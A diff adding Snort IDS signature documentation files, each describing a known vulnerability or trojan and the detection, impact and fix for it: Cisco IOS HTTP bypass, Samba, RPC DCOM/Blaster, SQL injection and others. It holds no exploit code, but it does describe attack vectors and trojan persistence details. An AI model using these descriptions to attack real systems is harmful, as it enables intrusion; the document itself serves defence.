+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1544.txt
@@ -0,0 +1,78 @@
+Rule:
+--
+Sid:
+1544
+--
+Summary:
+This event is generated when an attempt is made to list the user 
+configuration file on a Cisco router or switch.
+--
+Impact:
+If successful, the switch will reveal the local authentication user 
+configuration file to an attacker without requiring prior 
+authentication.
+--
+Detailed Information:
+The HTTP server that is part of some versions of the Cisco IOS software 
+allows remote command execution when the access control method is set to
+local authentication.
+
+--
+Affected Systems:
+The following Cisco products can be affected.   Whether they actually 
+are vulnerable or not depends on the version of IOS that they are 
+running.   To properly determine if your product is vulnerable, see the 
+Cisco website referenced below.   This is not exploitable if the device 
+is using an access control method other than local authentication.
+Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 
+1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, 
+AS5200, AS5300, AS5800, 6400, 7000, 7100, 7200, ubr7200, 7500, and 12000
+series.
+Most recent versions of the LS1010 ATM switch.
+The Catalyst 6000 and 5000 if they are running Cisco IOS software.
+The Catalyst 2900XL and 3500XL LAN switch only if it is running Cisco 
+IOS software.
+The Catalyst 2900 and 3000 series LAN switches are affected.
+The Cisco Distributed Director.
+--
+Attack Scenarios:
+By making the request to a vulnerable system, an attacker can take 
+complete control of a Cisco device.
+--
+Ease of Attack:
+Simple.  HTTP GET request, a browser may be used.
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+This rule only looks for one particular command (show config cr).
+However, this vulnerability will allow any other command to be executed 
+on the device at the highest privilege level, and this rule will 
+not detect them.
+
+This rule only looks for attacks against systems that are included 
+in the $HTTP_SERVERS group.   Many administrators do not consider 
+routers or switches to be web servers, and therefore may not include 
+vulnerable devices in this group, causing an attack to proceed 
+unnoticed. If you think one of your routers or switches is vulnerable, 
+reference it in the $HTTP_SERVERS group.
+--
+Corrective Action:
+Turn off the web server functionality, use access lists to ensure only 
+trusted hosts have access to the device, use TACACS+ or RADIUS for 
+access control, or upgrade your version of IOS.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Cisco
+http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000505.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000505
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Nucleus CMS" application running on a webserver. 
+Access to the file "server.php" using a remote file being passed as the 
+"DIR_LIB" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DIR_LIB" parameter in the "server.php" script used by 
+the "Nucleus CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Nucleus CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3031.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3031
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3121.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3121
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2622.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2622
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "drop_an_object" procedure contains a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the third variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/2545.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid:
+2545
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in AppleFileServer.
+
+-- 
+
+Impact: 
+Serious. Unauthorized remote administrative access.
+
+--
+Detailed Information:
+AppleFileServer is used to share files and mount remote drives between 
+machines using Apple Macintosh OS X. An error in the processing of
+PathName may lead to a buffer overflow. If the length of a string for
+AFPName is longer than the declared length, the buffer will be
+overflowed and may present an attacker with the opportunity to execute
+code of their choosing.
+
+--
+
+Attack Scenarios: 
+An attacker can supply an AFPName longer than what is expected by the
+service and overwrite portions of memory leading to the execution of
+code.
+
+-- 
+
+Ease of Attack: 
+Simple
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disable AFP if not needed
+
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000822.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000822
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "reply.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "reply.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1871.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1871
+
+--
+Summary:
+This event is generated when an attempt is made to access an Oracle 
+Application Server's XSQLConfig.xml configuration file.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+With the default installation of Oracle's  Application Server, it is 
+possible for an unauthorized user to view the XSQLConfig.xml file. This 
+file contains information such as the database server's name, user id's,
+and passwords.
+
+--
+Affected Systems:
+	Oracle 9i Application Server
+
+--
+Attack Scenarios:
+An attacker can use this to find out information about the database and 
+then use that information to compromise the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Apply appropriate permissions to the file.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0568
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10855
+
+--
--- /dev/null
+++ b/doc/signatures/1705.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1705
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/121.txt
@@ -0,0 +1,112 @@
+Rule:
+
+--
+Sid:
+121
+
+--
+Summary:
+Infector is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Infector sever to
+programs normally started on boot. Due to the nature of this Trojan it 
+is unlikely that the attacker's client IP address has been spoofed.
+
+	SID	Message
+	---	-------
+	117	Infector 1.x
+	120	Infector 1.6 Server to Client
+	121	Infector 1.6 Client to Server Connection Request
+
+This Trojan is commonly used to install other Trojan programs.
+
+The Trojan also makes changes to the system registry and win.ini file.
+
+Notification of an active server is achieved via IRC or ICQ.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Apxil32.exe a backup 
+copy is made and usually named D3x32.drv.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added are:
+
+	apxil32 = apxil32.exe
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Apxil32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected 
+machine is recommended.
+
+A change is also made to the win.ini file, the line run=apxil32.exe 
+apxil32.exe is added and should be deleted.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS315
+http://www.whitehats.com/info/IDS502
+http://www.whitehats.com/info/IDS503
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/infector.htm
+
+Megasecurity:
+http://www.megasecurity.org/trojans/i/infector/Infector_all.html
+
+Simovits:
+http://www.simovits.com/trojans/tr_data/y1627.html
+
+--
--- /dev/null
+++ b/doc/signatures/1082.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1082
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2493.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2493
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/2344.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2344
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ArGoSoft FTP Server.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorized administrative access.
+
+--
+Detailed Information:
+ArGoSoft FTP Server fails to perform sufficient checks on user supplied data to the
+XCWD command. An attacker may exploit this vulnerability to execute code of
+their choosing as the user running the process. This may lead to remote
+administrative access to the server.
+
+--
+Affected Systems:
+	ArGoSoft FTP Server 1.4.1 .1
+
+--
+Attack Scenarios:
+An attacker may connect to the server and supply spurious data to the
+XCWD command causing the overrun to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
